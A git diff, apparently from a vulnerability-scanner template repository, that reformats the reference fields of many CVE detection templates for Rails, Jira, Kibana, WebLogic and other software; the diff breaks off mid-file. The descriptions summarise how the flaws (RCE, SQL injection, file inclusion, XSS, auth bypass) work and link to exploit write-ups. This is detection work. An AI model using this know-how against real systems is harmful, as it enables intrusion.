Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed. - reference: | + reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ tags: cve,cve2019,rails,lfi diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml index 4412e644c6..f97c0dc144 100644 --- a/cves/2019/CVE-2019-7219.yaml +++ b/cves/2019/CVE-2019-7219.yaml @@ -6,7 +6,7 @@ info: severity: low description: | Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead. - reference: | + reference: - https://github.com/verifysecurity/CVE-2019-7219 - https://stash.kopano.io/repos?visibility=public tags: cve,cve2019,zarafa,xss diff --git a/cves/2019/CVE-2019-7481.yaml b/cves/2019/CVE-2019-7481.yaml index 8670029549..3f22173a79 100644 --- a/cves/2019/CVE-2019-7481.yaml +++ b/cves/2019/CVE-2019-7481.yaml @@ -6,7 +6,7 @@ info: severity: high description: | The SonicWall SRA 4600 VPN appliance suffers a pre-authentication SQL injection vulnerability. - reference: | + reference: - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/ tags: cve,cve2019,sonicwall,sqli diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml index a943b165a3..d2fd2f0946 100644 --- a/cves/2019/CVE-2019-7609.yaml +++ b/cves/2019/CVE-2019-7609.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. - reference: | + reference: - https://github.com/mpgn/CVE-2019-7609 - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 tags: cve,cve2019,kibana,rce diff --git a/cves/2019/CVE-2019-8449.yaml b/cves/2019/CVE-2019-8449.yaml index e1ab720711..9552542758 100644 --- a/cves/2019/CVE-2019-8449.yaml +++ b/cves/2019/CVE-2019-8449.yaml @@ -5,7 +5,7 @@ info: author: harshbothra_ severity: medium description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. - reference: | + reference: - https://www.doyler.net/security-not-included/more-jira-enumeration - https://jira.atlassian.com/browse/JRASERVER-69796 tags: cve,cve2019,atlassian,jira diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 6355caf5ba..24f1f508ee 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -5,7 +5,7 @@ info: author: TechbrunchFR severity: medium description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class. - reference: | + reference: - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://jira.atlassian.com/browse/JRASERVER-69793 tags: cve,cve2019,atlassian,jira,ssrf diff --git a/cves/2019/CVE-2019-8903.yaml b/cves/2019/CVE-2019-8903.yaml index c33deca749..38120db1ea 100644 --- a/cves/2019/CVE-2019-8903.yaml +++ b/cves/2019/CVE-2019-8903.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: high description: index.js in Total.js Platform before 3.2.3 allows path traversal. - reference: | + reference: - https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903 - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7 - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b diff --git a/cves/2019/CVE-2019-9041.yaml b/cves/2019/CVE-2019-9041.yaml index dd27fbd870..77491477a4 100644 --- a/cves/2019/CVE-2019-9041.yaml +++ b/cves/2019/CVE-2019-9041.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzz_template.php file, the parserIfLabel() function's filtering is not strict, resulting in PHP code execution, as demonstrated by the if:assert substring. - reference: | + reference: - http://www.iwantacve.cn/index.php/archives/118/ - https://www.exploit-db.com/exploits/46454/ tags: cve,cve2019,zzzcms,rce diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 5ed8f7c7f0..e2a6243b8b 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. - reference: | + reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 tags: cve,cve2019,wordpress,wp-plugin,lfi diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml index 6fa7ddce64..f4623231a4 100644 --- a/cves/2019/CVE-2019-9733.yaml +++ b/cves/2019/CVE-2019-9733.yaml @@ -4,7 +4,7 @@ info: author: akshansh severity: critical description: An issue was discovered in JFrog Artifactory 6.7.3. By default, the access-admin account is used to reset the password of the admin account in case an administrator gets locked out from the Artifactory console. This is only allowable from a connection directly from localhost, but providing a X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory. - reference: | + reference: - http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html - https://www.ciphertechs.com/jfrog-artifactory-advisory/ - https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6 diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml index 343916a8fc..5c6356d56d 100644 --- a/cves/2019/CVE-2019-9955.yaml +++ b/cves/2019/CVE-2019-9955.yaml @@ -6,7 +6,7 @@ info: severity: low tags: cve,cve2019,xss description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter. - reference: | + reference: http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html http://seclists.org/fulldisclosure/2019/Apr/22 https://www.exploit-db.com/exploits/46706/ diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml index fa58f56675..6ba8a88aee 100644 --- a/cves/2020/CVE-2020-0618.yaml +++ b/cves/2020/CVE-2020-0618.yaml @@ -5,7 +5,7 @@ info: author: joeldeleep description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'. severity: high - reference: | + reference: - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ - https://github.com/euphrat1ca/CVE-2020-0618 tags: cve,cve2020,rce diff --git a/cves/2020/CVE-2020-10546.yaml b/cves/2020/CVE-2020-10546.yaml index 05a39a2e12..658064e6d2 100644 --- a/cves/2020/CVE-2020-10546.yaml +++ b/cves/2020/CVE-2020-10546.yaml @@ -4,7 +4,7 @@ info: author: madrobot severity: high description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. - reference: | + reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli diff --git a/cves/2020/CVE-2020-10548.yaml b/cves/2020/CVE-2020-10548.yaml index 3d8b1c0e7f..d5d9e17baf 100644 --- a/cves/2020/CVE-2020-10548.yaml +++ b/cves/2020/CVE-2020-10548.yaml @@ -4,7 +4,7 @@ info: author: madrobot severity: high description: rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. - reference: | + reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli diff --git a/cves/2020/CVE-2020-10549.yaml b/cves/2020/CVE-2020-10549.yaml index 5165d18e5e..7447d9e4c9 100644 --- a/cves/2020/CVE-2020-10549.yaml +++ b/cves/2020/CVE-2020-10549.yaml @@ -4,7 +4,7 @@ info: author: madrobot severity: high description: rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. - reference: | + reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index 10ca5ff7f1..5ab3e4810e 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: low description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6. - reference: | + reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip - https://nvd.nist.gov/vuln/detail/CVE-2020-11034 diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index 9dca17f123..09b3133b28 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -6,7 +6,7 @@ info: name: Grafana Unauthenticated Stored XSS description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. tags: cve,cve2020,xss,grafana - reference: | + reference: - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 requests: diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml index d272459b58..88231d2864 100644 --- a/cves/2020/CVE-2020-11455.yaml +++ b/cves/2020/CVE-2020-11455.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. - reference: | + reference: - https://www.exploit-db.com/exploits/48297 - https://www.cvedetails.com/cve/CVE-2020-11455 tags: cve,cve2020,lfi diff --git a/cves/2020/CVE-2020-11930.yaml b/cves/2020/CVE-2020-11930.yaml index bb9b865da6..8561563078 100644 --- a/cves/2020/CVE-2020-11930.yaml +++ b/cves/2020/CVE-2020-11930.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. - reference: | + reference: - https://wpscan.com/vulnerability/10181 - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module tags: cve,cve2020,wordpress,xss diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml index 0b7751f18a..fac9efaabe 100644 --- a/cves/2020/CVE-2020-11978.yaml +++ b/cves/2020/CVE-2020-11978.yaml @@ -4,7 +4,7 @@ info: author: pdteam severity: high description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. - reference: | + reference: - https://github.com/pberba/CVE-2020-11978 - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - https://twitter.com/wugeej/status/1400336603604668418 diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index a3e209364d..e6ba5ee430 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml @@ -6,7 +6,7 @@ info: severity: critical description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. tags: cve,cve2020,netsweeper,rce - reference: | + reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index a9a57c35b7..46ac04bffe 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -11,7 +11,7 @@ info: 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone. - reference: | + reference: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html tags: cve,cve2020,apache diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml index 3d17f4d3c9..6f29058963 100644 --- a/cves/2020/CVE-2020-13942.yaml +++ b/cves/2020/CVE-2020-13942.yaml @@ -11,7 +11,7 @@ info: that could execute code with the permission level of the running Java process. This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later. - reference: | + reference: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://twitter.com/chybeta/status/1328912309440311297 tags: cve,cve2020,apache,rce diff --git a/cves/2020/CVE-2020-14181.yaml b/cves/2020/CVE-2020-14181.yaml index 5f17e0a7bf..d50f1e806d 100644 --- a/cves/2020/CVE-2020-14181.yaml +++ b/cves/2020/CVE-2020-14181.yaml @@ -5,7 +5,7 @@ info: author: bjhulst severity: medium description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. - reference: | + reference: - https://jira.atlassian.com/browse/JRASERVER-71560 - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html tags: cve,cve2020,atlassian,jira diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index edd398ebf6..9a0064925f 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -6,7 +6,7 @@ info: cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N' severity: high tags: cve,cve2020,oracle,lfi - reference: | + reference: - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html - https://www.oracle.com/security-alerts/cpuoct2020.html diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 4c2e370aa0..4703751c4b 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -4,7 +4,7 @@ info: name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass) author: dwisiswant0 severity: critical - reference: | + reference: - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - https://twitter.com/jas502n/status/1321416053050667009 - https://youtu.be/JFVDOIL0YtA diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml index a9e3680ead..67847810d6 100644 --- a/cves/2020/CVE-2020-15148.yaml +++ b/cves/2020/CVE-2020-15148.yaml @@ -4,7 +4,7 @@ info: name: Yii 2 (yiisoft/yii2) RCE author: pikpikcu severity: high - reference: | + reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md tags: cve,cve2020,rce,yii diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml index 75ab77e69a..4b1e65c8a7 100644 --- a/cves/2020/CVE-2020-15227.yaml +++ b/cves/2020/CVE-2020-15227.yaml @@ -5,7 +5,7 @@ info: author: becivells severity: high description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# diff --git a/cves/2020/CVE-2020-16846.yaml b/cves/2020/CVE-2020-16846.yaml index de4756b826..9cf24f5d88 100644 --- a/cves/2020/CVE-2020-16846.yaml +++ b/cves/2020/CVE-2020-16846.yaml @@ -9,7 +9,7 @@ info: with the SSH client enabled, can result in shell injection. This template supports the detection part only. See references. - reference: | + reference: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 tags: cve,cve2020,saltstack diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml index 372c227e0a..495e9c38e7 100644 --- a/cves/2020/CVE-2020-16952.yaml +++ b/cves/2020/CVE-2020-16952.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951. - reference: | + reference: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 - https://srcincite.io/pocs/cve-2020-16952.py.txt - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index 9c4507b2fa..fbae086491 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -4,7 +4,7 @@ info: name: Apache Struts RCE author: pikpikcu severity: critical - reference: | + reference: - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - http://jvn.jp/en/jp/JVN43969166/index.html - https://cwiki.apache.org/confluence/display/WW/S2-061 diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 1e17831e4b..7a5e9b010c 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability. - reference: | + reference: - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683 - http://www.openwall.com/lists/oss-security/2020/01/15/1 - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 05749737ab..987eee7315 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -5,7 +5,7 @@ info: author: foulenzer severity: critical description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. - reference: | + reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day tags: cve,cve2020,wordpress,rce diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 18de468cad..10a508915e 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. - reference: | + reference: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,dlink,rce,oob diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml index 35c649d8e1..fb40209d26 100644 --- a/cves/2020/CVE-2020-26153.yaml +++ b/cves/2020/CVE-2020-26153.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: | + reference: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 tags: cve,cve2020,xss,wordpress,wp-plugin diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index ec02c9eb2d..d3d76d844b 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind requests. - reference: | + reference: - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index c658ea4e31..ca236a5505 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. - reference: | + reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,netgear,rce,oob diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index 78a7cfb467..5ef1db5c75 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -6,7 +6,7 @@ info: severity: high description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. tags: cve,cve2020,netgear,auth-bypass - reference: | + reference: - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index acf4e53aa4..2bf5ae0888 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. - reference: | + reference: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index b6567e7135..2ce50c5cfa 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 843afecf33..469d3e038c 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. - reference: | + reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 tags: cve,cve2020,lfi diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml index 2de1016d50..9b1e964acb 100644 --- a/cves/2020/CVE-2020-29395.yaml +++ b/cves/2020/CVE-2020-29395.yaml @@ -4,7 +4,7 @@ info: name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: | + reference: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 tags: cve,cve2020,wordpress,xss,wp-plugin diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index 0a2da783b9..c2bfce5c8b 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused. - reference: | + reference: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 tags: cve,cve2020,gateone,lfi diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index 141cb2910f..cf3a2d1395 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml @@ -4,7 +4,7 @@ info: name: Cisco ASA XSS author: pikpikcu severity: medium - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-3580 - https://twitter.com/ptswarm/status/1408050644460650502 description: | diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index 142c4a081a..522d6d82c3 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -4,7 +4,7 @@ info: name: CSE Bookstore 1.0 SQL Injection author: geeknik description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. - reference: | + reference: - https://www.exploit-db.com/exploits/49314 - https://www.tenable.com/cve/CVE-2020-36112 severity: critical diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml index d211f4a8ba..22359eda5d 100644 --- a/cves/2020/CVE-2020-36289.yaml +++ b/cves/2020/CVE-2020-36289.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. tags: cve,cve2020,jira,atlassian - reference: | + reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml index 